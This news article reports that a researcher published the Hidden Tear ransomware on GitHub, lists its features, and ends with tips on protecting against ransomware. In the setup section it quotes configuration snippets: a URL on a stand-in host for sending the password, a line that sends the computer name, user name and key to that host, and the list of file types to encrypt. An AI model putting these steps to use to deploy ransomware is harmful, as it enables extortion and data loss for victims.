A Turkish security researcher named Utku Sen has posted a fully functional Ransomware code on open source code sharing website GitHub.
The Ransomware dubbed Hidden Tear, uses AES Encryption to lock down files before displaying a ransom message warning to get users to pay up.
The currently undetectable version of ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware.
Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.
The Hidden Tear — Free Ransomware Kit
The "Hidden Tear" Ransomware package consists of four files namely:
Hidden Tear Ransomware is capable of:
- Using AES algorithm to encrypt files
- Sending encryption key to a server
- Encrypting files and decrypting them using a decrypter program with the encryption key
- Creating a text file in Desktop with given message
- Small file size (12 KB)
- Evading detection by all standard anti-virus programs
How to Setup your Custom Ransomware Using Hidden Tear?
Sen has specified usage details as well, he says:
1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):
string targetURL = "https://www.example.com/hidden-tear/write.php?info=";
2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function:
string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);
3. Target file extensions can also be change. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
For Educational Purpose... REALLY!
Wait! Sen has something more to say, listening to which you might think...REALLY!!
With the whole project "Hidden Tear," there's an attached legal warning that says:
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Somebody should ask him… Why instigating people to commit a crime? One could imagine such "Educational Purposes" as there's a big chance of Ransomware to pop up in recent attacks.
A visit to the Video Demonstration of the sandbox testing of 'Hidden Tear' will give a real picture of what all it is capable of doing.
How to Protect Yourself from Ransomware Threat?
Two months ago, we introduced you a Free Ransomware Decryption and Malware Removal ToolKit that could help you deal with various variants of ransomware as well as help you unlock encrypted files without paying off to the cyber crooks.
However, there are some important steps that should be considered to protect yourself from Ransomware threats.
- Always keep regular backups of your important data.
- Make sure you run an active anti-virus security suite of tools on your system.
- Do not open email attachments from unknown sources.
- Most importantly, always browse the Internet safely.
To keep yourself safe, we also have an excellent article on How to protect your computer from ransomware malware?